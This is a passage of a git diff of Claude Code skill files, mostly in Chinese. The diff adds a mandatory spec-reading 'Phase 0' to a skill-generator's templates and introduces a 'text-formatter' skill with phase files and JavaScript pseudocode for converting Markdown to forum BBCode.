├── orchestrator-base.md # 编排器模板
|
||||
└── action-base.md # 动作模板
|
||||
```
|
||||
|
||||
## Reference Documents
|
||||
|
||||
| Document | Purpose |
|
||||
|----------|---------|
|
||||
| [phases/01-requirements-discovery.md](phases/01-requirements-discovery.md) | 收集 Skill 需求 |
|
||||
| [phases/02-structure-generation.md](phases/02-structure-generation.md) | 生成目录结构 |
|
||||
| [phases/03-phase-generation.md](phases/03-phase-generation.md) | 生成 Phase 文件 |
|
||||
| [phases/04-specs-templates.md](phases/04-specs-templates.md) | 生成规范和模板 |
|
||||
| [phases/05-validation.md](phases/05-validation.md) | 验证和文档 |
|
||||
| [specs/execution-modes.md](specs/execution-modes.md) | 执行模式规范 |
|
||||
| [specs/skill-requirements.md](specs/skill-requirements.md) | Skill 需求规范 |
|
||||
| [templates/skill-md.md](templates/skill-md.md) | SKILL.md 模板 |
|
||||
| [templates/sequential-phase.md](templates/sequential-phase.md) | Sequential Phase 模板 |
|
||||
| [templates/autonomous-orchestrator.md](templates/autonomous-orchestrator.md) | Autonomous 编排器模板 |
|
||||
| [templates/autonomous-action.md](templates/autonomous-action.md) | Autonomous Action 模板 |
|
||||
| [../_shared/SKILL-DESIGN-SPEC.md](../_shared/SKILL-DESIGN-SPEC.md) | 通用设计规范 |
|
||||
|
||||
@@ -2,6 +2,16 @@
|
||||
|
||||
自主模式编排器的模板。
|
||||
|
||||
## ⚠️ 重要提示
|
||||
|
||||
> **Phase 0 是强制前置阶段**:在 Orchestrator 启动执行循环之前,必须先完成 Phase 0 的规范研读。
|
||||
>
|
||||
> 生成 Orchestrator 时,需要确保:
|
||||
> 1. SKILL.md 中已包含 Phase 0 规范研读步骤
|
||||
> 2. Orchestrator 启动前验证规范已阅读
|
||||
> 3. 所有 Action 文件都引用相关的规范文档
|
||||
> 4. Architecture Overview 中 Phase 0 位于 Orchestrator 之前
|
||||
|
||||
## 模板结构
|
||||
|
||||
```markdown
|
||||
|
||||
@@ -2,6 +2,15 @@
|
||||
|
||||
顺序模式 Phase 文件的模板。
|
||||
|
||||
## ⚠️ 重要提示
|
||||
|
||||
> **Phase 0 是强制前置阶段**:在实现任何 Phase (1, 2, 3...) 之前,必须先完成 Phase 0 的规范研读。
|
||||
>
|
||||
> 生成 Sequential Phase 时,需要确保:
|
||||
> 1. SKILL.md 中已包含 Phase 0 规范研读步骤
|
||||
> 2. 每个 Phase 文件都引用相关的规范文档
|
||||
> 3. 执行流程明确标注 Phase 0 为禁止跳过的前置步骤
|
||||
|
||||
## 模板结构
|
||||
|
||||
```markdown
|
||||
|
||||
@@ -36,6 +36,16 @@ allowed-tools: {{allowed_tools}}
|
||||
|
||||
{{design_principles}}
|
||||
|
||||
---
|
||||
|
||||
## ⚠️ Mandatory Prerequisites (强制前置条件)
|
||||
|
||||
> **⛔ 禁止跳过**: 在执行任何操作之前,**必须**完整阅读以下文档。未阅读规范直接执行将导致输出不符合质量标准。
|
||||
|
||||
{{mandatory_prerequisites}}
|
||||
|
||||
---
|
||||
|
||||
## Execution Flow
|
||||
|
||||
{{execution_flow}}
|
||||
@@ -71,9 +81,10 @@ Bash(\`mkdir -p "\${workDir}"\`);
|
||||
| `{{description}}` | string | config.description |
|
||||
| `{{triggers}}` | string | config.triggers.join(", ") |
|
||||
| `{{allowed_tools}}` | string | config.allowed_tools.join(", ") |
|
||||
| `{{architecture_diagram}}` | string | 根据 execution_mode 生成 |
|
||||
| `{{architecture_diagram}}` | string | 根据 execution_mode 生成 (包含 Phase 0) |
|
||||
| `{{design_principles}}` | string | 根据 execution_mode 生成 |
|
||||
| `{{execution_flow}}` | string | 根据 phases/actions 生成 |
|
||||
| `{{mandatory_prerequisites}}` | string | 强制前置阅读文档列表 (specs + templates) |
|
||||
| `{{execution_flow}}` | string | 根据 phases/actions 生成 (Phase 0 在最前) |
|
||||
| `{{output_location}}` | string | config.output.location |
|
||||
| `{{additional_dirs}}` | string | 根据 execution_mode 生成 |
|
||||
| `{{output_structure}}` | string | 根据配置生成 |
|
||||
@@ -84,21 +95,48 @@ Bash(\`mkdir -p "\${workDir}"\`);
|
||||
```javascript
|
||||
function generateSkillMd(config) {
|
||||
const template = Read('templates/skill-md.md');
|
||||
|
||||
|
||||
return template
|
||||
.replace(/\{\{skill_name\}\}/g, config.skill_name)
|
||||
.replace(/\{\{display_name\}\}/g, config.display_name)
|
||||
.replace(/\{\{description\}\}/g, config.description)
|
||||
.replace(/\{\{triggers\}\}/g, config.triggers.map(t => `"${t}"`).join(", "))
|
||||
.replace(/\{\{allowed_tools\}\}/g, config.allowed_tools.join(", "))
|
||||
.replace(/\{\{architecture_diagram\}\}/g, generateArchitecture(config))
|
||||
.replace(/\{\{architecture_diagram\}\}/g, generateArchitecture(config)) // 包含 Phase 0
|
||||
.replace(/\{\{design_principles\}\}/g, generatePrinciples(config))
|
||||
.replace(/\{\{execution_flow\}\}/g, generateFlow(config))
|
||||
.replace(/\{\{mandatory_prerequisites\}\}/g, generatePrerequisites(config)) // 强制前置条件
|
||||
.replace(/\{\{execution_flow\}\}/g, generateFlow(config)) // Phase 0 在最前
|
||||
.replace(/\{\{output_location\}\}/g, config.output.location)
|
||||
.replace(/\{\{additional_dirs\}\}/g, generateAdditionalDirs(config))
|
||||
.replace(/\{\{output_structure\}\}/g, generateOutputStructure(config))
|
||||
.replace(/\{\{reference_table\}\}/g, generateReferenceTable(config));
|
||||
}
|
||||
|
||||
// 生成强制前置条件表格
|
||||
function generatePrerequisites(config) {
|
||||
const specs = config.specs || [];
|
||||
const templates = config.templates || [];
|
||||
|
||||
let result = '### 规范文档 (必读)\n\n';
|
||||
result += '| Document | Purpose | Priority |\n';
|
||||
result += '|----------|---------|----------|\n';
|
||||
|
||||
specs.forEach((spec, index) => {
|
||||
const priority = index === 0 ? '**P0 - 最高**' : 'P1';
|
||||
result += `| [${spec.path}](${spec.path}) | ${spec.purpose} | ${priority} |\n`;
|
||||
});
|
||||
|
||||
if (templates.length > 0) {
|
||||
result += '\n### 模板文件 (生成前必读)\n\n';
|
||||
result += '| Document | Purpose |\n';
|
||||
result += '|----------|---------|\n';
|
||||
templates.forEach(tmpl => {
|
||||
result += `| [${tmpl.path}](${tmpl.path}) | ${tmpl.purpose} |\n`;
|
||||
});
|
||||
}
|
||||
|
||||
return result;
|
||||
}
|
||||
```
|
||||
|
||||
## Sequential 模式示例
|
||||
@@ -118,6 +156,9 @@ Generate API documentation from source code.
|
||||
|
||||
\`\`\`
|
||||
┌─────────────────────────────────────────────────────────────────┐
|
||||
│ ⚠️ Phase 0: Specification → 阅读并理解设计规范 (强制前置) │
|
||||
│ Study │
|
||||
│ ↓ │
|
||||
│ Phase 1: Scanning → endpoints.json │
|
||||
│ ↓ │
|
||||
│ Phase 2: Parsing → schemas.json │
|
||||
@@ -125,6 +166,22 @@ Generate API documentation from source code.
|
||||
│ Phase 3: Generation → api-docs.md │
|
||||
└─────────────────────────────────────────────────────────────────┘
|
||||
\`\`\`
|
||||
|
||||
## ⚠️ Mandatory Prerequisites (强制前置条件)
|
||||
|
||||
> **⛔ 禁止跳过**: 在执行任何操作之前,**必须**完整阅读以下文档。
|
||||
|
||||
### 规范文档 (必读)
|
||||
|
||||
| Document | Purpose | Priority |
|
||||
|----------|---------|----------|
|
||||
| [specs/api-standards.md](specs/api-standards.md) | API 文档标准规范 | **P0 - 最高** |
|
||||
|
||||
### 模板文件 (生成前必读)
|
||||
|
||||
| Document | Purpose |
|
||||
|----------|---------|
|
||||
| [templates/endpoint-doc.md](templates/endpoint-doc.md) | 端点文档模板 |
|
||||
```
|
||||
|
||||
## Autonomous 模式示例
|
||||
@@ -144,6 +201,10 @@ Interactive task management with CRUD operations.
|
||||
|
||||
\`\`\`
|
||||
┌─────────────────────────────────────────────────────────────────┐
|
||||
│ ⚠️ Phase 0: Specification Study (强制前置) │
|
||||
└───────────────┬─────────────────────────────────────────────────┘
|
||||
↓
|
||||
┌─────────────────────────────────────────────────────────────────┐
|
||||
│ Orchestrator (状态驱动决策) │
|
||||
└───────────────┬─────────────────────────────────────────────────┘
|
||||
│
|
||||
@@ -153,4 +214,22 @@ Interactive task management with CRUD operations.
|
||||
│ List │ │Create │ │ Edit │ │Delete │
|
||||
└───────┘ └───────┘ └───────┘ └───────┘
|
||||
\`\`\`
|
||||
|
||||
## ⚠️ Mandatory Prerequisites (强制前置条件)
|
||||
|
||||
> **⛔ 禁止跳过**: 在执行任何操作之前,**必须**完整阅读以下文档。
|
||||
|
||||
### 规范文档 (必读)
|
||||
|
||||
| Document | Purpose | Priority |
|
||||
|----------|---------|----------|
|
||||
| [specs/task-schema.md](specs/task-schema.md) | 任务数据结构规范 | **P0 - 最高** |
|
||||
| [specs/action-catalog.md](specs/action-catalog.md) | 动作目录 | P1 |
|
||||
|
||||
### 模板文件 (生成前必读)
|
||||
|
||||
| Document | Purpose |
|
||||
|----------|---------|
|
||||
| [templates/orchestrator-base.md](templates/orchestrator-base.md) | 编排器模板 |
|
||||
| [templates/action-base.md](templates/action-base.md) | 动作模板 |
|
||||
```
|
||||
|
||||
196
.claude/skills/text-formatter/SKILL.md
Normal file
@@ -0,0 +1,196 @@
|
||||
---
|
||||
name: text-formatter
|
||||
description: Transform and optimize text content with intelligent formatting. Output BBCode + Markdown hybrid format optimized for forums. Triggers on "format text", "text formatter", "排版", "格式化文本", "BBCode".
|
||||
allowed-tools: Task, AskUserQuestion, Read, Write, Bash, Glob
|
||||
---
|
||||
|
||||
# Text Formatter
|
||||
|
||||
Transform and optimize text content with intelligent structure analysis. Output format: **BBCode + Markdown hybrid** optimized for forum publishing.
|
||||
|
||||
## Architecture Overview
|
||||
|
||||
```
|
||||
┌─────────────────────────────────────────────────────────────────┐
|
||||
│ Text Formatter Architecture (BBCode + MD Mode) │
|
||||
├─────────────────────────────────────────────────────────────────┤
|
||||
│ │
|
||||
│ Phase 1: Input Collection → 接收文本/文件 │
|
||||
│ ↓ │
|
||||
│ Phase 2: Content Analysis → 分析结构、识别 Callout/Admonition │
|
||||
│ ↓ │
|
||||
│ Phase 3: Format Transform → 转换为 BBCode+MD 格式 │
|
||||
│ ↓ │
|
||||
│ Phase 4: Output & Preview → 保存文件 + 预览 │
|
||||
│ │
|
||||
└─────────────────────────────────────────────────────────────────┘
|
||||
```
|
||||
|
||||
## Key Design Principles
|
||||
|
||||
1. **Single Format Output**: BBCode + Markdown hybrid (forum optimized)
|
||||
2. **Pixel-Based Sizing**: size=150/120/100/80 (not 1-7 levels)
|
||||
3. **Forum Compatibility**: Only use widely-supported BBCode tags
|
||||
4. **Markdown Separators**: Use `---` for horizontal rules (not `[hr]`)
|
||||
5. **No Alignment Tags**: `[align]` not supported, avoid usage
|
||||
|
||||
---
|
||||
|
||||
## Format Specification
|
||||
|
||||
### Supported BBCode Tags
|
||||
|
||||
| Tag | Usage | Example |
|
||||
|-----|-------|---------|
|
||||
| `[size=N]` | Font size (pixels) | `[size=120]Title[/size]` |
|
||||
| `[color=X]` | Text color (hex/name) | `[color=#2196F3]Blue[/color]` 或 `[color=blue]` |
|
||||
| `[b]` | Bold | `[b]Bold text[/b]` |
|
||||
| `[i]` | Italic | `[i]Italic[/i]` |
|
||||
| `[s]` | Strikethrough | `[s]deleted[/s]` |
|
||||
| `[u]` | Underline | `[u]underlined[/u]` |
|
||||
| `[quote]` | Quote block | `[quote]Content[/quote]` |
|
||||
| `[code]` | Code block | `[code]code[/code]` |
|
||||
| `[img]` | Image | `[img]url[/img]` |
|
||||
| `[url]` | Link | `[url=link]text[/url]` |
|
||||
| `[list]` | List container | `[list][*]item[/list]` |
|
||||
| `[spoiler]` | Collapsible content | `[spoiler=标题]隐藏内容[/spoiler]` |
|
||||
|
||||
### HTML to BBCode Conversion
|
||||
|
||||
| HTML Input | BBCode Output |
|
||||
|------------|---------------|
|
||||
| `<mark>高亮</mark>` | `[color=yellow]高亮[/color]` |
|
||||
| `<u>下划线</u>` | `[u]下划线[/u]` |
|
||||
| `<details><summary>标题</summary>内容</details>` | `[spoiler=标题]内容[/spoiler]` |
|
||||
|
||||
### Unsupported Tags (Avoid!)
|
||||
|
||||
| Tag | Reason | Alternative |
|
||||
|-----|--------|-------------|
|
||||
| `[align]` | Not rendered | Remove or use default left |
|
||||
| `[hr]` | Shows as text | Use Markdown `---` |
|
||||
| `<div>` | HTML not supported | Use BBCode only |
|
||||
| `[table]` | Limited support | Use list or code block |
|
||||
|
||||
### Size Hierarchy (Pixels)
|
||||
|
||||
| Element | Size | Color | Usage |
|
||||
|---------|------|-------|-------|
|
||||
| **Main Title** | 150 | #2196F3 | Document title |
|
||||
| **Section Title** | 120 | #2196F3 | Major sections (## H2) |
|
||||
| **Subsection** | 100 | #333 | Sub-sections (### H3) |
|
||||
| **Normal Text** | (default) | - | Body content |
|
||||
| **Notes/Gray** | 80 | gray | Footnotes, metadata |
|
||||
|
||||
### Color Palette
|
||||
|
||||
| Color | Hex | Semantic Usage |
|
||||
|-------|-----|----------------|
|
||||
| **Blue** | #2196F3 | Titles, links, info |
|
||||
| **Green** | #4CAF50 | Success, tips, features |
|
||||
| **Orange** | #FF9800 | Warnings, caution |
|
||||
| **Red** | #F44336 | Errors, danger, important |
|
||||
| **Purple** | #9C27B0 | Examples, code |
|
||||
| **Gray** | gray | Notes, metadata |
|
||||
|
||||
---
|
||||
|
||||
## Mandatory Prerequisites
|
||||
|
||||
> Read before execution:
|
||||
|
||||
| Document | Purpose | Priority |
|
||||
|----------|---------|----------|
|
||||
| [specs/format-rules.md](specs/format-rules.md) | Format conversion rules | **P0** |
|
||||
| [specs/element-mapping.md](specs/element-mapping.md) | Element type mappings | P1 |
|
||||
| [specs/callout-types.md](specs/callout-types.md) | Callout/Admonition types | P1 |
|
||||
|
||||
---
|
||||
|
||||
## Execution Flow
|
||||
|
||||
```
|
||||
┌────────────────────────────────────────────────────────────────┐
|
||||
│ Phase 1: Input Collection │
|
||||
│ - Ask: paste text OR file path │
|
||||
│ - Output: input-config.json │
|
||||
├────────────────────────────────────────────────────────────────┤
|
||||
│ Phase 2: Content Analysis │
|
||||
│ - Detect structure: headings, lists, code blocks, tables │
|
||||
│ - Identify Callouts/Admonitions (>[!type]) │
|
||||
│ - Output: analysis.json │
|
||||
├────────────────────────────────────────────────────────────────┤
|
||||
│ Phase 3: Format Transform │
|
||||
│ - Apply BBCode + MD rules from specs/format-rules.md │
|
||||
│ - Convert elements with pixel-based sizes │
|
||||
│ - Use Markdown --- for separators │
|
||||
│ - Output: formatted content │
|
||||
├────────────────────────────────────────────────────────────────┤
|
||||
│ Phase 4: Output & Preview │
|
||||
│ - Save to .bbcode.txt file │
|
||||
│ - Display preview │
|
||||
│ - Output: final file │
|
||||
└────────────────────────────────────────────────────────────────┘
|
||||
```
|
||||
|
||||
## Callout/Admonition Support
|
||||
|
||||
支持 Obsidian 风格的 Callout 语法,转换为 BBCode quote:
|
||||
|
||||
```markdown
|
||||
> [!NOTE]
|
||||
> 这是一个提示信息
|
||||
|
||||
> [!WARNING]
|
||||
> 这是一个警告信息
|
||||
```
|
||||
|
||||
转换结果:
|
||||
|
||||
```bbcode
|
||||
[quote]
|
||||
[size=100][color=#2196F3][b]📝 注意[/b][/color][/size]
|
||||
|
||||
这是一个提示信息
|
||||
[/quote]
|
||||
```
|
||||
|
||||
| Type | Color | Icon |
|
||||
|------|-------|------|
|
||||
| NOTE/INFO | #2196F3 | 📝 |
|
||||
| TIP/HINT | #4CAF50 | 💡 |
|
||||
| SUCCESS | #4CAF50 | ✅ |
|
||||
| WARNING/CAUTION | #FF9800 | ⚠️ |
|
||||
| DANGER/ERROR | #F44336 | ❌ |
|
||||
| EXAMPLE | #9C27B0 | 📋 |
|
||||
|
||||
## Directory Setup
|
||||
|
||||
```javascript
|
||||
const timestamp = new Date().toISOString().slice(0,10).replace(/-/g, '');
|
||||
const workDir = `.workflow/.scratchpad/text-formatter-${timestamp}`;
|
||||
|
||||
Bash(`mkdir -p "${workDir}"`);
|
||||
```
|
||||
|
||||
## Output Structure
|
||||
|
||||
```
|
||||
.workflow/.scratchpad/text-formatter-{date}/
|
||||
├── input-config.json # 输入配置
|
||||
├── analysis.json # 内容分析结果
|
||||
└── output.bbcode.txt # BBCode+MD 输出
|
||||
```
|
||||
|
||||
## Reference Documents
|
||||
|
||||
| Document | Purpose |
|
||||
|----------|---------|
|
||||
| [phases/01-input-collection.md](phases/01-input-collection.md) | 收集输入内容 |
|
||||
| [phases/02-content-analysis.md](phases/02-content-analysis.md) | 分析内容结构 |
|
||||
| [phases/03-format-transform.md](phases/03-format-transform.md) | 格式转换 |
|
||||
| [phases/04-output-preview.md](phases/04-output-preview.md) | 输出和预览 |
|
||||
| [specs/format-rules.md](specs/format-rules.md) | 格式转换规则 |
|
||||
| [specs/element-mapping.md](specs/element-mapping.md) | 元素映射表 |
|
||||
| [specs/callout-types.md](specs/callout-types.md) | Callout 类型定义 |
|
||||
| [templates/bbcode-template.md](templates/bbcode-template.md) | BBCode 模板 |
|
||||
111
.claude/skills/text-formatter/phases/01-input-collection.md
Normal file
@@ -0,0 +1,111 @@
|
||||
# Phase 1: Input Collection
|
||||
|
||||
收集用户输入的文本内容。
|
||||
|
||||
## Objective
|
||||
|
||||
- 获取用户输入内容(直接粘贴或文件路径)
|
||||
- 生成输入配置文件
|
||||
|
||||
**注意**: 输出格式固定为 BBCode + Markdown 混合格式(论坛优化),无需选择。
|
||||
|
||||
## Input
|
||||
|
||||
- 来源: 用户交互
|
||||
- 配置: 无前置依赖
|
||||
|
||||
## Execution Steps
|
||||
|
||||
### Step 1: 询问输入方式
|
||||
|
||||
```javascript
|
||||
const inputMethod = await AskUserQuestion({
|
||||
questions: [
|
||||
{
|
||||
question: "请选择输入方式",
|
||||
header: "输入方式",
|
||||
multiSelect: false,
|
||||
options: [
|
||||
{ label: "直接粘贴文本", description: "在对话中粘贴要格式化的内容" },
|
||||
{ label: "指定文件路径", description: "读取指定文件的内容" }
|
||||
]
|
||||
}
|
||||
]
|
||||
});
|
||||
```
|
||||
|
||||
### Step 2: 获取内容
|
||||
|
||||
```javascript
|
||||
let content = '';
|
||||
|
||||
if (inputMethod["输入方式"] === "直接粘贴文本") {
|
||||
// 提示用户粘贴内容
|
||||
const textInput = await AskUserQuestion({
|
||||
questions: [
|
||||
{
|
||||
question: "请粘贴要格式化的文本内容(粘贴后选择确认)",
|
||||
header: "文本内容",
|
||||
multiSelect: false,
|
||||
options: [
|
||||
{ label: "已粘贴完成", description: "确认已在上方粘贴内容" }
|
||||
]
|
||||
}
|
||||
]
|
||||
});
|
||||
// 从用户消息中提取文本内容
|
||||
content = extractUserText();
|
||||
} else {
|
||||
// 询问文件路径
|
||||
const filePath = await AskUserQuestion({
|
||||
questions: [
|
||||
{
|
||||
question: "请输入文件路径",
|
||||
header: "文件路径",
|
||||
multiSelect: false,
|
||||
options: [
|
||||
{ label: "已输入路径", description: "确认路径已在上方输入" }
|
||||
]
|
||||
}
|
||||
]
|
||||
});
|
||||
content = Read(extractedFilePath);
|
||||
}
|
||||
```
|
||||
|
||||
### Step 3: 保存配置
|
||||
|
||||
```javascript
|
||||
const config = {
|
||||
input_method: inputMethod["输入方式"],
|
||||
target_format: "BBCode+MD", // 固定格式
|
||||
original_content: content,
|
||||
timestamp: new Date().toISOString()
|
||||
};
|
||||
|
||||
Write(`${workDir}/input-config.json`, JSON.stringify(config, null, 2));
|
||||
```
|
||||
|
||||
## Output
|
||||
|
||||
- **File**: `input-config.json`
|
||||
- **Format**: JSON
|
||||
|
||||
```json
|
||||
{
|
||||
"input_method": "直接粘贴文本",
|
||||
"target_format": "BBCode+MD",
|
||||
"original_content": "...",
|
||||
"timestamp": "2026-01-13T..."
|
||||
}
|
||||
```
|
||||
|
||||
## Quality Checklist
|
||||
|
||||
- [ ] 成功获取用户输入内容
|
||||
- [ ] 内容非空且有效
|
||||
- [ ] 配置文件已保存
|
||||
|
||||
## Next Phase
|
||||
|
||||
→ [Phase 2: Content Analysis](02-content-analysis.md)
|
||||
248
.claude/skills/text-formatter/phases/02-content-analysis.md
Normal file
@@ -0,0 +1,248 @@
|
||||
# Phase 2: Content Analysis
|
||||
|
||||
分析输入内容的结构和语义元素。
|
||||
|
||||
## Objective
|
||||
|
||||
- 识别内容结构(标题、段落、列表等)
|
||||
- 检测特殊元素(代码块、表格、链接等)
|
||||
- 生成结构化分析结果
|
||||
|
||||
## Input
|
||||
|
||||
- 依赖: `input-config.json`
|
||||
- 配置: `{workDir}/input-config.json`
|
||||
|
||||
## Execution Steps
|
||||
|
||||
### Step 1: 加载输入
|
||||
|
||||
```javascript
|
||||
const config = JSON.parse(Read(`${workDir}/input-config.json`));
|
||||
const content = config.original_content;
|
||||
```
|
||||
|
||||
### Step 2: 结构分析
|
||||
|
||||
```javascript
|
||||
function analyzeStructure(text) {
|
||||
const analysis = {
|
||||
elements: [],
|
||||
stats: {
|
||||
headings: 0,
|
||||
paragraphs: 0,
|
||||
lists: 0,
|
||||
code_blocks: 0,
|
||||
tables: 0,
|
||||
links: 0,
|
||||
images: 0,
|
||||
quotes: 0,
|
||||
callouts: 0
|
||||
}
|
||||
};
|
||||
|
||||
// Callout 检测正则 (Obsidian 风格)
|
||||
const CALLOUT_PATTERN = /^>\s*\[!(\w+)\](?:\s+(.+))?$/;
|
||||
|
||||
const lines = text.split('\n');
|
||||
let currentElement = null;
|
||||
let inCodeBlock = false;
|
||||
let inList = false;
|
||||
|
||||
for (let i = 0; i < lines.length; i++) {
|
||||
const line = lines[i];
|
||||
|
||||
// 检测代码块
|
||||
if (line.match(/^```/)) {
|
||||
inCodeBlock = !inCodeBlock;
|
||||
if (inCodeBlock) {
|
||||
analysis.elements.push({
|
||||
type: 'code_block',
|
||||
start: i,
|
||||
language: line.replace(/^```/, '').trim()
|
||||
});
|
||||
analysis.stats.code_blocks++;
|
||||
}
|
||||
continue;
|
||||
}
|
||||
|
||||
if (inCodeBlock) continue;
|
||||
|
||||
// 检测标题 (Markdown 或纯文本模式)
|
||||
if (line.match(/^#{1,6}\s/)) {
|
||||
const level = line.match(/^(#+)/)[1].length;
|
||||
analysis.elements.push({
|
||||
type: 'heading',
|
||||
level: level,
|
||||
content: line.replace(/^#+\s*/, ''),
|
||||
line: i
|
||||
});
|
||||
analysis.stats.headings++;
|
||||
continue;
|
||||
}
|
||||
|
||||
// 检测列表
|
||||
if (line.match(/^[\s]*[-*+]\s/) || line.match(/^[\s]*\d+\.\s/)) {
|
||||
if (!inList) {
|
||||
analysis.elements.push({
|
||||
type: 'list',
|
||||
start: i,
|
||||
ordered: line.match(/^\d+\./) !== null
|
||||
});
|
||||
analysis.stats.lists++;
|
||||
inList = true;
|
||||
}
|
||||
continue;
|
||||
} else {
|
||||
inList = false;
|
||||
}
|
||||
|
||||
// 检测 Callout (Obsidian 风格) - 优先于普通引用
|
||||
const calloutMatch = line.match(CALLOUT_PATTERN);
|
||||
if (calloutMatch) {
|
||||
const calloutType = calloutMatch[1].toLowerCase();
|
||||
const calloutTitle = calloutMatch[2] || null;
|
||||
// 收集 Callout 内容行
|
||||
const calloutContent = [];
|
||||
let j = i + 1;
|
||||
while (j < lines.length && lines[j].startsWith('>')) {
|
||||
calloutContent.push(lines[j].replace(/^>\s*/, ''));
|
||||
j++;
|
||||
}
|
||||
analysis.elements.push({
|
||||
type: 'callout',
|
||||
calloutType: calloutType,
|
||||
title: calloutTitle,
|
||||
content: calloutContent.join('\n'),
|
||||
start: i,
|
||||
end: j - 1
|
||||
});
|
||||
analysis.stats.callouts++;
|
||||
i = j - 1; // 跳过已处理的行
|
||||
continue;
|
||||
}
|
||||
|
||||
// 检测普通引用
|
||||
if (line.match(/^>\s/)) {
|
||||
analysis.elements.push({
|
||||
type: 'quote',
|
||||
content: line.replace(/^>\s*/, ''),
|
||||
line: i
|
||||
});
|
||||
analysis.stats.quotes++;
|
||||
continue;
|
||||
}
|
||||
|
||||
// 检测表格
|
||||
if (line.match(/^\|.*\|$/)) {
|
||||
analysis.elements.push({
|
||||
type: 'table_row',
|
||||
line: i
|
||||
});
|
||||
if (!analysis.elements.find(e => e.type === 'table')) {
|
||||
analysis.stats.tables++;
|
||||
}
|
||||
continue;
|
||||
}
|
||||
|
||||
// 检测链接
|
||||
const links = line.match(/\[([^\]]+)\]\(([^)]+)\)/g);
|
||||
if (links) {
|
||||
analysis.stats.links += links.length;
|
||||
}
|
||||
|
||||
// 检测图片
|
||||
const images = line.match(/!\[([^\]]*)\]\(([^)]+)\)/g);
|
||||
if (images) {
|
||||
analysis.stats.images += images.length;
|
||||
}
|
||||
|
||||
// 普通段落
|
||||
if (line.trim() && !line.match(/^[-=]{3,}$/)) {
|
||||
analysis.elements.push({
|
||||
type: 'paragraph',
|
||||
line: i,
|
||||
preview: line.substring(0, 50)
|
||||
});
|
||||
analysis.stats.paragraphs++;
|
||||
}
|
||||
}
|
||||
|
||||
return analysis;
|
||||
}
|
||||
|
||||
const analysis = analyzeStructure(content);
|
||||
```
|
||||
|
||||
### Step 3: 语义增强
|
||||
|
||||
```javascript
|
||||
// 识别特殊语义
|
||||
function enhanceSemantics(text, analysis) {
|
||||
const enhanced = { ...analysis };
|
||||
|
||||
// 检测关键词强调
|
||||
const boldPatterns = text.match(/\*\*[^*]+\*\*/g) || [];
|
||||
const italicPatterns = text.match(/\*[^*]+\*/g) || [];
|
||||
|
||||
enhanced.semantics = {
|
||||
emphasis: {
|
||||
bold: boldPatterns.length,
|
||||
italic: italicPatterns.length
|
||||
},
|
||||
estimated_reading_time: Math.ceil(text.split(/\s+/).length / 200) // 200 words/min
|
||||
};
|
||||
|
||||
return enhanced;
|
||||
}
|
||||
|
||||
const enhancedAnalysis = enhanceSemantics(content, analysis);
|
||||
```
|
||||
|
||||
### Step 4: 保存分析结果
|
||||
|
||||
```javascript
|
||||
Write(`${workDir}/analysis.json`, JSON.stringify(enhancedAnalysis, null, 2));
|
||||
```
|
||||
|
||||
## Output
|
||||
|
||||
- **File**: `analysis.json`
|
||||
- **Format**: JSON
|
||||
|
||||
```json
|
||||
{
|
||||
"elements": [
|
||||
{ "type": "heading", "level": 1, "content": "Title", "line": 0 },
|
||||
{ "type": "paragraph", "line": 2, "preview": "..." },
|
||||
{ "type": "callout", "calloutType": "warning", "title": "注意事项", "content": "...", "start": 4, "end": 6 },
|
||||
{ "type": "code_block", "start": 8, "language": "javascript" }
|
||||
],
|
||||
"stats": {
|
||||
"headings": 3,
|
||||
"paragraphs": 10,
|
||||
"lists": 2,
|
||||
"code_blocks": 1,
|
||||
"tables": 0,
|
||||
"links": 5,
|
||||
"images": 0,
|
||||
"quotes": 1,
|
||||
"callouts": 2
|
||||
},
|
||||
"semantics": {
|
||||
"emphasis": { "bold": 5, "italic": 3 },
|
||||
"estimated_reading_time": 2
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Quality Checklist
|
||||
|
||||
- [ ] 所有结构元素已识别
|
||||
- [ ] 统计信息准确
|
||||
- [ ] 语义增强完成
|
||||
- [ ] 分析文件已保存
|
||||
|
||||
## Next Phase
|
||||
|
||||
→ [Phase 3: Format Transform](03-format-transform.md)
|
||||
245
.claude/skills/text-formatter/phases/03-format-transform.md
Normal file
@@ -0,0 +1,245 @@
|
||||
# Phase 3: Format Transform
|
||||
|
||||
将内容转换为 BBCode + Markdown 混合格式(论坛优化)。
|
||||
|
||||
## Objective
|
||||
|
||||
- 根据分析结果转换内容
|
||||
- 应用像素级字号规则
|
||||
- 处理 Callout/标注语法
|
||||
- 生成论坛兼容的输出
|
||||
|
||||
## Input
|
||||
|
||||
- 依赖: `input-config.json`, `analysis.json`
|
||||
- 规范: `specs/format-rules.md`, `specs/element-mapping.md`
|
||||
|
||||
## Format Specification
|
||||
|
||||
### Size Hierarchy (Pixels)
|
||||
|
||||
| Element | Size | Color | Usage |
|
||||
|---------|------|-------|-------|
|
||||
| **H1** | 150 | #2196F3 | 文档主标题 |
|
||||
| **H2** | 120 | #2196F3 | 章节标题 |
|
||||
| **H3** | 100 | #333 | 子标题 |
|
||||
| **H4+** | (默认) | - | 仅加粗 |
|
||||
| **Notes** | 80 | gray | 备注/元数据 |
|
||||
|
||||
### Unsupported Tags (禁止使用)
|
||||
|
||||
| Tag | Reason | Alternative |
|
||||
|-----|--------|-------------|
|
||||
| `[align]` | 不渲染 | 删除,使用默认左对齐 |
|
||||
| `[hr]` | 显示为文本 | 使用 Markdown `---` |
|
||||
| `[table]` | 支持有限 | 转为列表或代码块 |
|
||||
| HTML tags | 不支持 | 仅使用 BBCode |
|
||||
|
||||
## Execution Steps
|
||||
|
||||
### Step 1: 加载配置和分析
|
||||
|
||||
```javascript
|
||||
const config = JSON.parse(Read(`${workDir}/input-config.json`));
|
||||
const analysis = JSON.parse(Read(`${workDir}/analysis.json`));
|
||||
const content = config.original_content;
|
||||
```
|
||||
|
||||
### Step 2: Callout 配置
|
||||
|
||||
```javascript
|
||||
// Callout 类型映射(像素级字号)
|
||||
const CALLOUT_CONFIG = {
|
||||
// 信息类
|
||||
note: { icon: '📝', color: '#2196F3', label: '注意' },
|
||||
info: { icon: 'ℹ️', color: '#2196F3', label: '信息' },
|
||||
abstract: { icon: '📄', color: '#2196F3', label: '摘要' },
|
||||
summary: { icon: '📄', color: '#2196F3', label: '摘要' },
|
||||
tldr: { icon: '📄', color: '#2196F3', label: '摘要' },
|
||||
|
||||
// 成功/提示类
|
||||
tip: { icon: '💡', color: '#4CAF50', label: '提示' },
|
||||
hint: { icon: '💡', color: '#4CAF50', label: '提示' },
|
||||
success: { icon: '✅', color: '#4CAF50', label: '成功' },
|
||||
check: { icon: '✅', color: '#4CAF50', label: '完成' },
|
||||
